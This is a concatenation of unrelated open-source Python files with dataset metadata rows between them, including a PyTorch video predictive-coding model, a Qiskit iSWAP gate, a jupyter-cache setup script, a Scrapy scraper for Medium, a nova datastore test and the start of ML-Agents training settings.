self.param['hidden_size'] = self.param['feature_size'] # param for GRU
self.agg = ConvGRU(input_size=self.param['feature_size'],
hidden_size=self.param['hidden_size'],
kernel_size=1,
num_layers=self.param['num_layers'],
radius_type=self.radius_type)
# two layered network \phi
self.network_pred = nn.Sequential(
nn.Conv2d(self.param['feature_size'],
self.param['feature_size'], kernel_size=1, padding=0),
nn.ReLU(inplace=True),
nn.Conv2d(self.param['feature_size'],
self.param['feature_size'], kernel_size=1, padding=0)
)
if self.radius_type == 'log' and self.distance_type == 'uncertain':
print('[model_3d.py] Using log as radius_type')
self.activation = exp_activation()
# what does mask do ?
self.mask = None
self.relu = nn.ReLU(inplace=False)
self._initialize_weights(self.agg)
self._initialize_weights(self.network_pred)
def forward(self, block):
# block: [B, N, C, SL, W, H]
### extract feature ###
# [ Batch , Number of sequences, Channels, Sequence Length, Height, Weight ]
(B, N, C, SL, H, W) = block.shape
# [ 4, 8, 3, 256, 128, 128 ]
# batch and number of sequences can be combined
block = block.view(B * N, C, SL, H, W)
# [ 32, 3, 256, 128, 128 ]
# pass through backbone (f)
feature = self.backbone(block)
#[32, 256, 2, 4, 4]
# if self.distance == 'circle' and self.radius_type=='log':
# # predict abs(r) instead of (r)
# feature[:,-1,:,:,:] = torch.exp(feature[:,-1,:,:,:])
del block
# pool{2} as denoted in the paper
feature = F.avg_pool3d(
feature, (self.last_duration, 1, 1), stride=(1, 1, 1))
# [32, 256, 1, 4, 4]
# In case we use circle loss, this would be [32, 257, 1, 4, 4]
# logging the radii of tubes here
# We have
#print (self.param['feature_size'], feature.shape)
feature_inf_all = feature.view(
B, N, self.param['feature_size'], self.last_size, self.last_size) # before ReLU, (-inf, +inf)
# [4, 8, 256, 4, 4]
feature = self.relu(feature) # [0, +inf)
# [32, 256, 1, 4, 4]
# [B,N,D,6,6], [0, +inf)
feature = feature.view(
B, N, self.param['feature_size'], self.last_size, self.last_size)
# [4, 8, 256, 4, 4]
# makes a copy of the tensor (why do we need this ?)
gt = feature_inf_all[:, N - self.pred_step::, :].contiguous()
# [4, 3, 256, 4, 4]
del feature_inf_all
### aggregate, predict future ###
# [4, 5, 256, 4, 4]
_, hidden = self.agg(feature[:, 0:N - self.pred_step, :].contiguous())
# [4, 1, 256, 4, 4]
# after tanh, (-1,1). get the hidden state of last layer, last time step
hidden = hidden[:, -1, :]
# [4, 256, 4, 4]
# get the results for pre_step number of steps
pred = []
for i in range(self.pred_step):
# sequentially pred future for pred_step number of times
#print (hidden.shape)
p_tmp = self.network_pred(hidden)
#print (p_tmp[:,-1,:,:])
if self.distance_type == 'uncertain' and self.radius_type == 'log':
p_tmp = self.activation(p_tmp)
#print (p_tmp[:,-1,:,:])
pred.append(p_tmp)
# take hidden state along with encoding
_, hidden = self.agg(
self.relu(p_tmp).unsqueeze(1), hidden.unsqueeze(0))
hidden = hidden[:, -1, :]
#[4, 256, 4, 4]
pred = torch.stack(pred, 1) # B, pred_step, xxx
#[4, 3, 256, 4, 4]
del hidden
### Get similarity score ###
# pred: [B, pred_step, D, last_size, last_size]
# GT: [B, N, D, last_size, last_size]
N = self.pred_step
# dot product D dimension in pred-GT pair, get a 6d tensor. First 3 dims are from pred, last 3 dims are from GT.
# predicted
pred = pred.permute(0, 1, 3, 4, 2).contiguous().view(
B * self.pred_step * self.last_size**2, self.param['feature_size'])
# leave the radius out
if self.distance_type == 'uncertain':
pred_embedding = pred[:, :-1]
pred_radius = pred[:, -1].expand(1, -1)
elif self.distance_type == 'certain':
pred_embedding = pred
# GT
gt = gt.permute(0, 1, 3, 4, 2).contiguous().view(
B * N * self.last_size**2, self.param['feature_size'])
# leave the radius out
if self.distance_type == 'uncertain':
gt_embedding = gt[:, :-1]
gt_radius = gt[:, -1].expand(1, -1)
elif self.distance_type == 'certain':
gt_embedding = gt
# dot product to get the score
# change this using einstein notation
if self.distance == 'dot':
gt_embedding = gt_embedding.transpose(0, 1)
score = torch.matmul(pred_embedding, gt_embedding)
# print(score)
elif self.distance == 'cosine':
pred_norm = torch.norm(pred_embedding, dim=1)
gt_norm = torch.norm(gt_embedding, dim=1)
#print(pred_embedding.shape, pred_norm.shape, pred_norm.expand(1,-1).shape)
#print(gt_embedding.shape, gt_norm.shape, gt_norm.expand(1,-1).shape)
gt_embedding = gt_embedding.transpose(0, 1)
score = torch.matmul(pred_embedding, gt_embedding)
#print("score shape: (%d, %d)" % (score.shape[0], score.shape[1]))
# print("max value of dot product: %f" %
# torch.max(score).detach().cpu().numpy())
# print("min value of dot product: %f" %
# torch.min(score).detach().cpu().numpy())
# normalizing with magnitudes
# row-wise division
score = torch.div(score, pred_norm.expand(1, -1).T)
# column-wise division
score = torch.div(score, gt_norm)
# print("max value of cosine: %f" %
# np.max(score.detach().cpu().numpy()))
# print("min value of cosine: %f" %
# np.min(score.detach().cpu().numpy()))
del pred_embedding, gt_embedding
# division by the magnitude of respective vectors
elif self.distance == 'L2':
pred_embedding_mult = pred_embedding.reshape(
pred_embedding.shape[0], 1, pred_embedding.shape[1])
difference = pred_embedding_mult - gt_embedding
score = torch.sqrt(torch.einsum(
'ijk,ijk->ij', difference, difference))
# print(score)
del pred_embedding_mult, gt_embedding, difference
# on the certainity of distances
if self.distance_type == 'uncertain':
if self.radius_which == 'pred':
#print ('[model_3d.py] Using the pred radii of tube')
# .view(B, self.pred_step, self.last_size**2, B, N, self.last_size**2)
#print (score.shape, pred_radius.shape)
final_score = (score - pred_radius.T).contiguous()
elif self.radius_which == 'gt':
#print ('[model_3d.py] Using the ground truth radii of tube')
# .view(B, self.pred_step, self.last_size**2, B, N, self.last_size**2)
#print (score.shape, gt_radius.shape)
final_score = (score - gt_radius).contiguous()
zero_tensor = torch.zeros_like(final_score)
# treat both positive and negative instances as same wrt score function
if self.positive_vs_negative == 'same':
#print ('[model_3d.py] Setting distance_type to same')
final_score = torch.max(torch.stack(
[final_score, zero_tensor]), axis=0).values
del zero_tensor
elif self.positive_vs_negative == 'different':
#print ('[model_3d.py] Setting distance_type to different')
# check if it's a positive or negative instance
# if positive leave as is
# if negative multiply with -1
ones_tensor = -torch.ones_like(final_score)
torch.diagonal(ones_tensor).fill_(1.0)
# invert the score if negatives, take maximum
final_score = torch.max(torch.stack(
[final_score * ones_tensor, zero_tensor]), axis=0).values
# corresponding to first block - take first column
del zero_tensor, ones_tensor
elif self.distance_type == 'certain':
# .view(B, self.pred_step, self.last_size**2, B, N, self.last_size**2)
final_score = score.contiguous()
zero_tensor = torch.zeros_like(final_score)
if self.positive_vs_negative == 'same':
#print ('[model_3d.py] Setting distance_type to same')
final_score = torch.max(torch.stack(
[final_score, zero_tensor]), axis=0).values
del zero_tensor
elif self.positive_vs_negative == 'different':
ones_tensor = -torch.ones_like(final_score)
torch.diagonal(ones_tensor).fill_(1.0)
final_score = torch.max(torch.stack(
[final_score * ones_tensor, zero_tensor]), axis=0).values
#print (final_score)
del zero_tensor, ones_tensor
del score
# Mask Calculation
if self.mask is None: # only compute mask once
# mask meaning:
# -2: omit,
# -1: temporal neg (hard),
# 0: easy neg,
# 1: pos,
# -3: spatial neg
# easy negatives (do not take gradient here)
mask = torch.zeros((B, self.pred_step, self.last_size**2, B, N, self.last_size**2),
dtype=torch.int8, requires_grad=False).detach().cuda()
# spatial negative (mark everything in the same batch as spatial negative)
mask[torch.arange(B), :, :, torch.arange(B),
:, :] = -3 # spatial neg
# temporal negetive
for k in range(B):
mask[k, :, torch.arange(
self.last_size**2), k, :, torch.arange(self.last_size**2)] = -1 # temporal neg
# positive
tmp = mask.permute(0, 2, 1, 3, 5, 4).contiguous().view(
B * self.last_size**2, self.pred_step, B * self.last_size**2, N)
for j in range(B * self.last_size**2):
tmp[j, torch.arange(self.pred_step), j, torch.arange(
N - self.pred_step, N)] = 1 # pos
mask = tmp.view(B, self.last_size**2, self.pred_step,
B, self.last_size**2, N).permute(0, 2, 1, 3, 5, 4)
self.mask = mask
# final_score returned as predxGT matrix
return [final_score, self.mask]
def _initialize_weights(self, module):
for name, param in module.named_parameters():
if 'bias' in name:
nn.init.constant_(param, 0.0)
elif 'weight' in name:
nn.init.orthogonal_(param, 1)
# other resnet weights have been initialized in resnet itself
def reset_mask(self):
self.mask = None
class exp_activation(nn.Module):
def __init__(self):
'''
Init method.
'''
super().__init__() # init the base class
def forward(self, input):
'''
Forward pass of the function.
'''
return exp_radius(input)
def exp_radius(input):
input[:, -1, :, :] = torch.exp(input[:, -1, :, :])
return input
if __name__ == '__main__':
mymodel = DPC_RNN(128, num_seq=8, seq_len=5, pred_step=3,
distance='L2',
distance_type='uncertain',
positive_vs_negative='different',
radius_type='linear',
radius_which='pred',
network='resnet18')
mymodel = mymodel.cuda()
# (B, N, C, SL, H, W)
mydata = torch.cuda.FloatTensor(1, 8, 3, 5, 128, 128)
nn.init.uniform_(mydata,100,100000)
#import ipdb; ipdb.set_trace()
mymodel(mydata)
# x = torch.tensor([[1,1,1],[2,2,2],[3,3,3],[4,4,4]])
# y = torch.tensor([[8,8,8],[16,16,16],[32,32,32],[64,64,64]])
# x_em = x[:,:-1]
# y_em = y[:,:-1]
# x_ri = x[:,-1].expand(1,-1)
# z = y_em.reshape(y_em.shape[0], 1, y_em.shape[1])
# difference = z - x_em
# score = torch.sqrt(torch.einsum('ijk,ijk->ij', difference, difference).float())
# score = score - x_ri
# score = score.permute(1,0) | 38.152709 | 120 | 0.548031 |
d63ac8130ce0602008d67e956f34d70154c33824 | 1,029 | py | Python | python_code/vnev/Lib/site-packages/jdcloud_sdk/services/vqd/client/VqdClient.py | Ureimu/weather-robot | 7634195af388538a566ccea9f8a8534c5fb0f4b6 | [
"MIT"
] | 14 | 2018-04-19T09:53:56.000Z | 2022-01-27T06:05:48.000Z | python_code/vnev/Lib/site-packages/jdcloud_sdk/services/vqd/client/VqdClient.py | Ureimu/weather-robot | 7634195af388538a566ccea9f8a8534c5fb0f4b6 | [
"MIT"
] | 15 | 2018-09-11T05:39:54.000Z | 2021-07-02T12:38:02.000Z | python_code/vnev/Lib/site-packages/jdcloud_sdk/services/vqd/client/VqdClient.py | Ureimu/weather-robot | 7634195af388538a566ccea9f8a8534c5fb0f4b6 | [
"MIT"
] | 33 | 2018-04-20T05:29:16.000Z | 2022-02-17T09:10:05.000Z | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudclient import JDCloudClient
from jdcloud_sdk.core.config import Config
class VqdClient(JDCloudClient):
def __init__(self, credential, config=None, logger=None):
if config is None:
config = Config('vqd.jdcloud-api.com')
super(VqdClient, self).__init__(credential, config, 'vqd', '0.1.1', logger)
| 34.3 | 83 | 0.74344 |
8d753c3a70719e75e183676ee66dc5cff5bfecd3 | 2,175 | py | Python | setup.py | AakashGfude/jupyter-cache | ffdbe9b541e97f60f4123bd66fa450c8ba0bfe26 | [
"MIT"
] | null | null | null | setup.py | AakashGfude/jupyter-cache | ffdbe9b541e97f60f4123bd66fa450c8ba0bfe26 | [
"MIT"
] | null | null | null | setup.py | AakashGfude/jupyter-cache | ffdbe9b541e97f60f4123bd66fa450c8ba0bfe26 | [
"MIT"
] | null | null | null | """jupyter-cache package setup."""
from importlib import import_module
from setuptools import find_packages, setup
setup(
name="jupyter-cache",
version=import_module("jupyter_cache").__version__,
description=("A defined interface for working with a cache of jupyter notebooks."),
long_description=open("README.md").read(),
long_description_content_type="text/markdown",
url="https://github.com/ExecutableBookProject/jupyter-cache",
author="Chris Sewell",
author_email="chrisj_sewell@hotmail.com",
license="MIT",
packages=find_packages(),
entry_points={
"console_scripts": ["jcache = jupyter_cache.cli.commands.cmd_main:jcache"],
"jupyter_executors": [
"basic = jupyter_cache.executors.basic:JupyterExecutorBasic"
],
},
classifiers=[
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
],
python_requires=">=3.6",
# note: nbdime could be made an extra
install_requires=[
"attrs",
"nbformat",
"nbdime",
# "nbclient~=0.1",
"nbconvert",
"sqlalchemy~=1.3.12",
],
extras_require={
"cli": ["click", "click-completion", "click-log", "tabulate", "pyyaml"],
"code_style": ["flake8<3.8.0,>=3.7.0", "black", "pre-commit==1.17.0"],
"testing": [
"coverage",
"pytest>=3.6,<4",
"pytest-cov",
"pytest-regressions",
"matplotlib",
"numpy",
"sympy",
"pandas",
],
"rtd": ["myst-nb~=0.7", "sphinx-copybutton", "pydata-sphinx-theme"],
},
zip_safe=True,
)
| 35.080645 | 87 | 0.584828 |
6df3dcd55ef9f82efbe0fabdd9ce1c28a8782d35 | 3,188 | py | Python | qiskit/circuit/library/standard_gates/iswap.py | siddharthdangwal/qiskit-terra | af34eb06f28de18ef276e1e9029c62a4e35dd6a9 | [
"Apache-2.0"
] | null | null | null | qiskit/circuit/library/standard_gates/iswap.py | siddharthdangwal/qiskit-terra | af34eb06f28de18ef276e1e9029c62a4e35dd6a9 | [
"Apache-2.0"
] | null | null | null | qiskit/circuit/library/standard_gates/iswap.py | siddharthdangwal/qiskit-terra | af34eb06f28de18ef276e1e9029c62a4e35dd6a9 | [
"Apache-2.0"
] | 1 | 2020-07-13T17:56:46.000Z | 2020-07-13T17:56:46.000Z | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2017, 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""iSWAP gate."""
import numpy as np
from qiskit.circuit.gate import Gate
from qiskit.circuit.quantumregister import QuantumRegister
class iSwapGate(Gate):
r"""iSWAP gate.
A 2-qubit XX+YY interaction.
This is a Clifford and symmetric gate. Its action is to swap two qubit
states and phase the :math:`|01\rangle` and :math:`|10\rangle`
amplitudes by i.
**Circuit Symbol:**
.. parsed-literal::
q_0: ─⨂─
│
q_1: ─⨂─
**Reference Implementation:**
.. parsed-literal::
┌───┐┌───┐ ┌───┐
q_0: ┤ S ├┤ H ├──■──┤ X ├─────
├───┤└───┘┌─┴─┐└─┬─┘┌───┐
q_1: ┤ S ├─────┤ X ├──■──┤ H ├
└───┘ └───┘ └───┘
**Matrix Representation:**
.. math::
iSWAP = R_{XX+YY}(-\frac{\pi}{2})
= exp(i \frac{\pi}{4} (X{\otimes}X+Y{\otimes}Y)) =
\begin{pmatrix}
1 & 0 & 0 & 0 \\
0 & 0 & i & 0 \\
0 & i & 0 & 0 \\
0 & 0 & 0 & 1
\end{pmatrix}
This gate is equivalent to a SWAP up to a diagonal.
.. math::
iSWAP =
\begin{pmatrix}
1 & 0 & 0 & 0 \\
0 & 0 & 1 & 0 \\
0 & 1 & 0 & 0 \\
0 & 0 & 0 & 1
\end{pmatrix}
. \begin{pmatrix}
1 & 0 & 0 & 0 \\
0 & i & 0 & 0 \\
0 & 0 & i & 0 \\
0 & 0 & 0 & 1
\end{pmatrix}
"""
def __init__(self):
"""Create new iSwap gate."""
super().__init__('iswap', 2, [])
def _define(self):
"""
gate iswap a,b {
s q[0];
s q[1];
h q[0];
cx q[0],q[1];
cx q[1],q[0];
h q[1];
}
"""
# pylint: disable=cyclic-import
from qiskit.circuit.quantumcircuit import QuantumCircuit
from .h import HGate
from .s import SGate
from .x import CXGate
q = QuantumRegister(2, 'q')
qc = QuantumCircuit(q, name=self.name)
rules = [
(SGate(), [q[0]], []),
(SGate(), [q[1]], []),
(HGate(), [q[0]], []),
(CXGate(), [q[0], q[1]], []),
(CXGate(), [q[1], q[0]], []),
(HGate(), [q[1]], [])
]
qc.data = rules
self.definition = qc
def to_matrix(self):
"""Return a numpy.array for the iSWAP gate."""
return np.array([[1, 0, 0, 0],
[0, 0, 1j, 0],
[0, 1j, 0, 0],
[0, 0, 0, 1]], dtype=complex)
| 26.789916 | 77 | 0.440088 |
64e025296dd76c7046ecdb35b08dd9cb55092d34 | 238 | py | Python | pycouchdb/__init__.py | almararamara/py-couchdb | cb85366023f65e50387c07b93549150801115a08 | [
"BSD-3-Clause"
] | 62 | 2015-03-30T07:39:24.000Z | 2021-12-07T08:54:10.000Z | pycouchdb/__init__.py | almararamara/py-couchdb | cb85366023f65e50387c07b93549150801115a08 | [
"BSD-3-Clause"
] | 31 | 2015-04-26T20:21:28.000Z | 2021-11-06T11:31:35.000Z | pycouchdb/__init__.py | almararamara/py-couchdb | cb85366023f65e50387c07b93549150801115a08 | [
"BSD-3-Clause"
] | 19 | 2015-06-05T13:03:45.000Z | 2021-11-04T04:53:24.000Z | # -*- coding: utf-8 -*-
__author__ = "Andrey Antukh"
__license__ = "BSD"
__version__ = "1.14.1"
__maintainer__ = "Rinat Sabitov"
__email__ = "rinat.sabitov@gmail.com"
__status__ = "Development"
from .client import Server # noqa: F401
| 19.833333 | 40 | 0.701681 |
053aeb190b0f1714ddfe1e1174fd8db973aeccef | 380 | py | Python | hijack/urls.py | pennersr/django-hijack | 0b97745be1eb7f0ebbf2946f7bdb32f7fc90f736 | [
"MIT"
] | null | null | null | hijack/urls.py | pennersr/django-hijack | 0b97745be1eb7f0ebbf2946f7bdb32f7fc90f736 | [
"MIT"
] | null | null | null | hijack/urls.py | pennersr/django-hijack | 0b97745be1eb7f0ebbf2946f7bdb32f7fc90f736 | [
"MIT"
] | 1 | 2019-09-29T04:50:23.000Z | 2019-09-29T04:50:23.000Z | try:
from django.conf.urls import patterns, url
except ImportError:
from django.conf.urls.defaults import patterns, url
urlpatterns = patterns('hijack.views',
url(r'^email/(?P<email>[\w.%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4})/$', 'login_with_email'),
url(r'^username/(?P<username>\w+)/$', 'login_with_username'),
url(r'^(?P<userId>\w+)/$', 'login_with_id'),
)
| 31.666667 | 92 | 0.626316 |
129f1a4cf432b2a4f9d8250e94e41076836e9e9b | 2,481 | py | Python | __scraping__/medium.com/main.py | whitmans-max/python-examples | 881a8f23f0eebc76816a0078e19951893f0daaaa | [
"MIT"
] | 140 | 2017-02-21T22:49:04.000Z | 2022-03-22T17:51:58.000Z | __scraping__/medium.com/main.py | whitmans-max/python-examples | 881a8f23f0eebc76816a0078e19951893f0daaaa | [
"MIT"
] | 5 | 2017-12-02T19:55:00.000Z | 2021-09-22T23:18:39.000Z | __scraping__/medium.com/main.py | whitmans-max/python-examples | 881a8f23f0eebc76816a0078e19951893f0daaaa | [
"MIT"
] | 79 | 2017-01-25T10:53:33.000Z | 2022-03-11T16:13:57.000Z | #!/usr/bin/env python3
# date: 2020.02.24
# https://stackoverflow.com/questions/60383237/itemloader-in-scrapy/
import scrapy
from scrapy.loader import ItemLoader
from scrapy.spiders import CrawlSpider
import logging
from scrapy.utils.log import configure_logging
class MediumItem(scrapy.Item):
Title = scrapy.Field()
Name = scrapy.Field()
Date = scrapy.Field()
Read = scrapy.Field()
Publication = scrapy.Field()
Claps = scrapy.Field()
Responses = scrapy.Field()
Page = scrapy.Field()
class DataSpider(CrawlSpider):
custom_settings = {
'LOG_FILE': 'my_log.log',
'LOG_LEVEL': 'ERROR'}
logging.getLogger().addHandler(logging.StreamHandler())
name = 'data'
allowed_domains = ['medium.com', 'towardsdatascience.com']
start_urls = ['https://medium.com/tag/python/archive/02/01']
#handle_httpstatus_list = [302]
def parse(self,response):
print('url:', response.url)
articles = response.xpath('//div[@class="postArticle postArticle--short js-postArticle js-trackPostPresentation js-trackPostScrolls"]')
for article in articles:
if article.xpath('.//a[@class="button button--smaller button--chromeless u-baseColor--buttonNormal"]/@href').extract_first():
l = ItemLoader(item = MediumItem(), selector = article)
l.default_output_processor = scrapy.loader.processors.TakeFirst()
l.add_css('Title','div > h3::text')
l.add_xpath('Name','.//a[@class="ds-link ds-link--styleSubtle link link--darken link--accent u-accentColor--textNormal u-accentColor--textDarken"]/text()')
l.add_css('Read','span::attr(title)')
l.add_xpath('Publication', './/a[@class="ds-link ds-link--styleSubtle link--darkenlink--accent u-accentColor--textNormal"]/text()')
l.add_xpath('Claps','.//button[@class="button button--chromeless u-baseColor--buttonNormal js-multirecommendCountButton u-disablePointerEvents"]/text()')
l.add_xpath('Responses','.//a[@class="button button--chromeless u-baseColor--buttonNormal"]/text()')
l.add_value('Page', response.url)
yield l.load_item()
from scrapy.crawler import CrawlerProcess
c = CrawlerProcess({
'USER_AGENT': 'Mozilla/5.0',
# save in file CSV, JSON or XML
'FEED_FORMAT': 'csv', # csv, json, xml
'FEED_URI': 'output.csv', #
})
c.crawl(DataSpider)
c.start()
| 42.050847 | 171 | 0.654172 |
f4165a257ca8edcf93a8c836fc0916ef701bf094 | 2,801 | py | Python | nova/tests/datastore_unittest.py | bopopescu/cc | 5c14efcda95c4987532484c84a885a3b07efc984 | [
"Apache-2.0"
] | null | null | null | nova/tests/datastore_unittest.py | bopopescu/cc | 5c14efcda95c4987532484c84a885a3b07efc984 | [
"Apache-2.0"
] | 1 | 2020-08-02T15:40:49.000Z | 2020-08-02T15:40:49.000Z | nova/tests/datastore_unittest.py | bopopescu/cc | 5c14efcda95c4987532484c84a885a3b07efc984 | [
"Apache-2.0"
] | 1 | 2020-07-25T17:56:39.000Z | 2020-07-25T17:56:39.000Z | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2010 Anso Labs, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova import test
from nova import datastore
import random
class KeeperTestCase(test.BaseTestCase):
"""
Basic persistence tests for Keeper datastore.
Generalize, then use these to support
migration to redis / cassandra / multiple stores.
"""
def __init__(self, *args, **kwargs):
"""
Create a new keeper instance for test keys.
"""
super(KeeperTestCase, self).__init__(*args, **kwargs)
self.keeper = datastore.Keeper('test-')
def tear_down(self):
"""
Scrub out test keeper data.
"""
pass
def test_store_strings(self):
"""
Confirm that simple strings go in and come out safely.
Should also test unicode strings.
"""
randomstring = ''.join(
[random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890-')
for _x in xrange(20)]
)
self.keeper['test_string'] = randomstring
self.assertEqual(randomstring, self.keeper['test_string'])
def test_store_dicts(self):
"""
Arbitrary dictionaries should be storable.
"""
test_dict = {'key_one': 'value_one'}
self.keeper['test_dict'] = test_dict
self.assertEqual(test_dict['key_one'],
self.keeper['test_dict']['key_one'])
def test_sets(self):
"""
A keeper dict should be self-serializing.
"""
self.keeper.set_add('test_set', 'foo')
test_dict = {'arbitrary': 'dict of stuff'}
self.keeper.set_add('test_set', test_dict)
self.assertTrue(self.keeper.set_is_member('test_set', 'foo'))
self.assertFalse(self.keeper.set_is_member('test_set', 'bar'))
self.keeper.set_remove('test_set', 'foo')
self.assertFalse(self.keeper.set_is_member('test_set', 'foo'))
rv = self.keeper.set_fetch('test_set')
self.assertEqual(test_dict, rv.next())
self.keeper.set_remove('test_set', test_dict)
| 34.580247 | 78 | 0.647269 |
80d6c226fd66b00de6e1e673817a7c261e17effe | 2,076 | py | Python | save_beta_residue.py | helloTC/Rest_activation_prediction | f67cfe221d9f63afd67a2a5ef6330b8519ca7641 | [
"MIT"
] | null | null | null | save_beta_residue.py | helloTC/Rest_activation_prediction | f67cfe221d9f63afd67a2a5ef6330b8519ca7641 | [
"MIT"
] | null | null | null | save_beta_residue.py | helloTC/Rest_activation_prediction | f67cfe221d9f63afd67a2a5ef6330b8519ca7641 | [
"MIT"
] | null | null | null | import framework_rt as fr
from os.path import join as pjoin
import cifti
from ATT.iofunc import iofiles
from sklearn import linear_model
import numpy as np
from scipy import stats
from ATT.algorithm import tools
with open('/nfs/s2/userhome/huangtaicheng/hworkingshop/hcp_test/tables/subjIC_sessid', 'r') as f:
subjID = f.read().splitlines()
subjID = subjID[:203]
nsubj = len(subjID)
mask, header = cifti.read('/nfs/p1/atlases/multimodal_glasser/surface/MMP_mpmLR32k.dlabel.nii')
neighbor_table = fr.mask_dictdata(mask)
actmap_path = ['/nfs/s2/userhome/huangtaicheng/hworkingshop/hcp_test/task_merge_cohend/cohend_24contrast_zscore/'+sid+'_cohend_zscore.dtseries.nii' for sid in subjID]
icmap_subj_itr_path = ['/nfs/s2/userhome/huangtaicheng/hworkingshop/hcp_test/rest_comp/subjIC_itr/IC50_'+sid+'.dscalar.nii' for sid in subjID]
glm = linear_model.LinearRegression(fit_intercept=False)
actmap = fr.cifti_read(actmap_path, 0, 'both')
actmap_zscore = stats.zscore(actmap,axis=-1)
mean_actmap = np.mean(actmap_zscore,axis=0)
for i in range(nsubj):
glm.fit(mean_actmap.T, actmap_zscore[i,...].T)
actmap_zscore[i,...] = actmap_zscore[i,...] - np.dot(glm.coef_, mean_actmap)
subcortex_component = np.array([27,28,31,34,36,38,39,40,41,42,43,44,45,46,47,48,49])
# subcortex_component = np.array([])
cortex_component = np.delete(np.arange(50), subcortex_component)
icmap = fr.cifti_read(icmap_subj_itr_path, cortex_component, 'both')
icmap_zscore = stats.zscore(icmap,axis=-1)
# mean_icmap = np.mean(icmap_zscore,axis=0)
# for i in range(nsubj):
# glm.fit(mean_icmap.T, icmap_zscore[i,...].T)
# icmap_zscore[i,...] = icmap_zscore[i,...] - np.dot(glm.coef_, mean_icmap)
for i in range(nsubj):
print('Now calculating beta for subject {0}'.format(i+1))
betamap, scoremap = fr.linear_estimate_model(actmap_zscore[i,...], icmap_zscore[i,...], neighbor_table)
fr.save_maps_to_nifti(betamap, pjoin('/nfs/s2/userhome/huangtaicheng/hworkingshop/hcp_test/program/framework/betamap/MMP_cortex_33comp_residuecognitive', 'beta_'+str(i+1)+'.nii.gz'))
| 42.367347 | 186 | 0.755299 |
62ded20ed115292d2b1a0ba6f5d7917e1cf49b4f | 27,310 | py | Python | ml-agents/mlagents/trainers/settings.py | J-Travnik/ml-agents | c392380ab32bd762536a83501483dd5e7d1898c8 | [
"Apache-2.0"
] | null | null | null | ml-agents/mlagents/trainers/settings.py | J-Travnik/ml-agents | c392380ab32bd762536a83501483dd5e7d1898c8 | [
"Apache-2.0"
] | null | null | null | ml-agents/mlagents/trainers/settings.py | J-Travnik/ml-agents | c392380ab32bd762536a83501483dd5e7d1898c8 | [
"Apache-2.0"
] | null | null | null | import warnings
import attr
import cattr
from typing import Dict, Optional, List, Any, DefaultDict, Mapping, Tuple, Union
from enum import Enum
import collections
import argparse
import abc
import numpy as np
import math
from mlagents.trainers.cli_utils import StoreConfigFile, DetectDefault, parser
from mlagents.trainers.cli_utils import load_config
from mlagents.trainers.exception import TrainerConfigError, TrainerConfigWarning
from mlagents_envs import logging_util
from mlagents_envs.side_channel.environment_parameters_channel import (
EnvironmentParametersChannel,
)
logger = logging_util.get_logger(__name__)
def check_and_structure(key: str, value: Any, class_type: type) -> Any:
attr_fields_dict = attr.fields_dict(class_type)
if key not in attr_fields_dict:
raise TrainerConfigError(
f"The option {key} was specified in your YAML file for {class_type.__name__}, but is invalid."
)
# Apply cattr structure to the values
return cattr.structure(value, attr_fields_dict[key].type)
def strict_to_cls(d: Mapping, t: type) -> Any:
if not isinstance(d, Mapping):
raise TrainerConfigError(f"Unsupported config {d} for {t.__name__}.")
d_copy: Dict[str, Any] = {}
d_copy.update(d)
for key, val in d_copy.items():
d_copy[key] = check_and_structure(key, val, t)
return t(**d_copy)
def defaultdict_to_dict(d: DefaultDict) -> Dict:
return {key: cattr.unstructure(val) for key, val in d.items()}
class SerializationSettings:
convert_to_barracuda = True
convert_to_onnx = True
onnx_opset = 9
@attr.s(auto_attribs=True)
class ExportableSettings:
def as_dict(self):
return cattr.unstructure(self)
class EncoderType(Enum):
SIMPLE = "simple"
NATURE_CNN = "nature_cnn"
RESNET = "resnet"
class ScheduleType(Enum):
CONSTANT = "constant"
LINEAR = "linear"
@attr.s(auto_attribs=True)
class NetworkSettings:
@attr.s
class MemorySettings:
sequence_length: int = attr.ib(default=64)
memory_size: int = attr.ib(default=128)
@memory_size.validator
def _check_valid_memory_size(self, attribute, value):
if value <= 0:
raise TrainerConfigError(
"When using a recurrent network, memory size must be greater than 0."
)
elif value % 2 != 0:
raise TrainerConfigError(
"When using a recurrent network, memory size must be divisible by 2."
)
normalize: bool = False
hidden_units: int = 128
num_layers: int = 2
vis_encode_type: EncoderType = EncoderType.SIMPLE
memory: Optional[MemorySettings] = None
@attr.s(auto_attribs=True)
class BehavioralCloningSettings:
demo_path: str
steps: int = 0
strength: float = 1.0
samples_per_update: int = 0
# Setting either of these to None will allow the Optimizer
# to decide these parameters, based on Trainer hyperparams
num_epoch: Optional[int] = None
batch_size: Optional[int] = None
@attr.s(auto_attribs=True)
class HyperparamSettings:
batch_size: int = 1024
